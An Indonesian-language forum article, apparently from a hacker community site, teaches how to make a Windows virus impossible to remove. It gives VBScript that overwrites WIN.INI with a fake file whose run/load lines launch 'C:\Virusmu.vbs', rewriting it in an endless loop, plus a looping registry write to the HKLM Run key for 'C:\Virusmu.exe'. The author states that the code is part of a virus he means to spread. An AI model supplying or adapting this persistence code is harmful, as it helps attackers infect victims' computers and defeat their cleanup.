|
Masih ingat sama tulisan Sto di buku STH(Hack 1x19),tentang
bagaimana menjalankan program secara remote pada komputer korban.Nah bagi para
master virus juga pasti udah tau tentang manipulasi File WIN.INI yang terletak
pada C:\WINDOWS\WIN.INI.
Selain manipulasi WIN.INI,bisa juga digunakan manipulasi File
System.INI,atau manipulasi Registry(Regedit.Exe).Sebelumnya akan saya ceritakan
tentang Virus yang pernah saya temukan pada komputer teman saya,ternyata virus
itu melakukan manipulasi pada file WIN.INI,yaitu pada bagian Run untuk menjalankan
program virus itu tiap kali komputer Starting.Ketika aku mencoba menghapus virusnya
ternyata tidak bisa,kemudian aku membuka file WIN.INI dan menghapus bagian Run
tadi,Setelah komputer aku Restart Virus yang tadi aku temukan dapat aku delete
dengan mudah.Nah dari sini kita dapat memanfaatkan Do...Loop(baca tulisanku
yang dulu “Anti Deletion File”),untuk membuat Virus yang kita buat
jadi sakti(tereksekusi terus)didalam komputer korban.Gimana caranya?nah lihat
script ini aja ntar aku jelasin satu persatu.bagian yang saya pikir kalian semua
dah tau akan saya loncati Oke?
Dim syarah,sarah ‘menentukan variabel Set syarah=createObject(“Scripting.FileSystemObject”) ‘mengeset nilai syarah set sarah=syarah.CreateTextFile(“C:\WINDOWS\System.tegal”) ‘menciptakan file System dengan extensi tegal(nama dan extensi optional)
sarah.Writeline “[WINDOWS]” sarah.Writeline “run=C:\Virusmu.vbs” sarah.Writeline “Load=C:\Virusmu.vbs” sarah.Writeline “[Intl]” sarah.Writeline “ICountry=62” sarah.Writeline “sCountry=Indonesia” sarah.Writeline “sCurrency=Rp” sarah.Writeline “sLanguage=Ind” ‘diatas adalah isi dari file System.Tegal
sarah.Close ‘aku pikir kalian pasti tau Set suci=syarah.GetFile(“C:\WINDOWS\System.tegal”) ‘Memberi nilai pada variabel suci Do suci.Copy “C:\WINDOWS\WIN.INI” ‘mengkopikan System.Tegal ke direktori Windows dengan nama WIN.INI(inilah
hebatnya VBS dia dapat ‘dikopikan dengan nama yang lain dan extensinya
dapat dirubah) Loop ‘ini fungsi Loop yang akan membuat WIN.INI palsu tidak bisa dihapus sekaligus tidak bisa di edit ‘artinya meski anda berhasil menghapus bagian run-nya,tapi akan tercopy
lagi seperti semula.
Sebenernya script diatas adalah bagian dari Virus yang mau aku sebarkan(harusnya
masih rahasia nih),kurang apa aku ma Jasakom(cieileh ngrayu terus,biar dapet
buku gratis dari Sto : P).Script diatas akan menciptakan File System.Tegal(Optional,bisa
pake nama&Extensi apa aja yang penting bisa menipu)yang jelas Ciptakan file
dengan extensi terserah anda dalam hal ini saya pake extensi .Tegal(karena ga
ada program yang bisa baca Extensi .Tegal).Setelah itu Copykan file itu di Direktory
Windows dengan nama WIN.INI(rubah extensinya)File WIN.INI sudah ada akan digantikan
dengan File yang anda buat.Manipulasi ini dapat pula dilakukan pada Registry(Regedit.exe).Nih
lihat contohnya aja biar jelas
Do Set sarah=CreateObject(“Wscript.Shell”) sarah.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Sarah”,
”C:\Virusmu.exe” Loop
Nah dengan begitu meski anda dapat menghapus(Mengedit)Registry,dalam
hal ini menghapus sarah dengan data “C:\Virusmu.exe” tapi setelah
anda beranjak pergi akan terjadi penulisan disana lagi.Maka dari itulah jangan
sekali-kali percaya dengan satu kali penghapusan,ceklah berulang kali file atau
tempat-tempat yang dapat dimanipulasi oleh virus.oke sekian dulu tulisan sederhana
dari kota Tegal damai.Sebelumnya saya mengucapkan maaf bila artikel semacam
ini(atau mirip)sudah pernah ditulis(dimanapun),karena hanya pakai logika yang
sederhana saya pikir banyak pula orang yang sudah tau(apalagi para master).Maaf
sekali lagi saya hanya Newbie,jadi bila ada kesalahan mohon koreksi.Ini terkait
pula dengan tulisanku”Anti deletion File”di Jasakom,ada yang kasih
komentar kalau tulisan semacam itu pernah ditulis di IT centernya Unpad,saya
mohon maaf sekali lagi kepada IT Center Unpad,karena saya benar-benar tidak
menyontek tulisan anda(karena saya sendiri ga tau tentang IT center nya Unpad)
dan saya benar-benar menemukan logikanya sendiri,Jadi sekali lagi saya mohon
maaf yang sebesar-besarnya bila ada kesamaan informasi dari tulisan saya.
Greetz
1.My Family
2.My Honey Syarah
3.Tomero&divk0p1m1x(thank's koreksinya)
4.Temen semua
|